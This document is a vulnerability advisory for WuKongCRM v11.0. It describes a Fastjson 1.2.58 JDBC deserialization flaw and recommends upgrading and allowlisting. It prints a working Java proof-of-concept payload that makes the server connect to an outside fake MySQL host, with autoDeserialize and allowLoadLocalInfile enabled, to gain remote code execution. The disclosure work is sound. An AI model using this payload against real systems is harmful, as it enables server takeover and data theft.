WuKongCRM v11.0 Fastjson JDBC Deserialization Vulnerability (CWE-502)

[ez-lbz]

WuKongCRM v11.0 Fastjson JDBC Deserialization Vulnerability (CWE-502)

Summary

WuKongCRM v11.0 is vulnerable to a Fastjson JDBC deserialization vulnerability due to the continued use of Fastjson version 1.2.58. A similar vulnerability was previously reported in WuKongCRM v9.0.1 (reference), which developers attempted to mitigate by removing the xbean dependency and disabling AutoType. However, the core issue remains because the Fastjson library itself was never upgraded, leaving the application still susceptible to deserialization-based remote code execution (RCE).

The project further includes mysql-connector-java 8.0.19 and jackson-databind 2.10.2, which can be chained together to achieve RCE.

Details

By leveraging the outdated Fastjson 1.2.58 parser, attackers can trigger malicious gadget chains. A proof-of-concept exploit was demonstrated using the following steps:

1. Start a fake MySQL server using the javachains toolkit.
2. Select the Jackson + TemplatesImpl gadget chain to generate a malicious payload.

3. Send a specially crafted payload to one of the numerous deserialization sinks present in WuKongCRM v11.0.

package org.example;

import static com.alibaba.fastjson.JSON.parseObject;

public class Main {
    public static void main(String[] args) {
        String Json = "{\n" +
                "    \"@type\": \"java.lang.AutoCloseable\",\n" +
                "    \"@type\": \"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection\",\n" +
                "    \"proxy\": {\n" +
                "        \"@type\": \"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy\",\n" +
                "        \"connectionUrl\": {\n" +
                "            \"@type\": \"com.mysql.cj.conf.url.ReplicationConnectionUrl\",\n" +
                "            \"masters\": [\n" +
                "                {\n" +
                "                    \"host\": \"123.57.23.40\"\n" +
                "                }\n" +
                "            ],\n" +
                "            \"slaves\": [],\n" +
                "            \"properties\": {\n" +
                "                \"host\": \"123.57.23.40\",\n" +
                "                \"user\": \"df8a76b\",\n" +
                "                \"dbname\": \"dbname\",\n" +
                "                \"password\": \"pass\",\n" +
                "                \"queryInterceptors\": \"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\",\n" +
                "                \"autoDeserialize\": \"true\",\n" +
                "                \"allowLoadLocalInfile\": \"true\"\n" +
                "            }\n" +
                "        }\n" +
                "    }\n" +
                "}";
        parseObject(Json);
    }
}

4. Upon successful exploitation, arbitrary code execution is achieved, demonstrated by popping the calculator.

The number of potential deserialization entry points in the project is significant, and tools such as CodeQL can be used to quickly enumerate these vulnerable locations.

Impact

• Remote Code Execution (RCE) on the application server

• Complete system compromise, including data exfiltration or further lateral movement within the internal network

• High risk due to multiple deserialization sinks and default vulnerable configuration

Root Cause

• Use of outdated Fastjson 1.2.58 vulnerable to unsafe deserialization

• Inadequate patching strategy that disabled some features but did not remove or upgrade vulnerable components

Recommendation

• Upgrade Fastjson to at least 1.2.83 or newer.

• Validate all deserialization inputs to ensure only trusted data is processed.

• Audit code for unsafe deserialization sinks and apply strict allowlists or alternative serialization frameworks.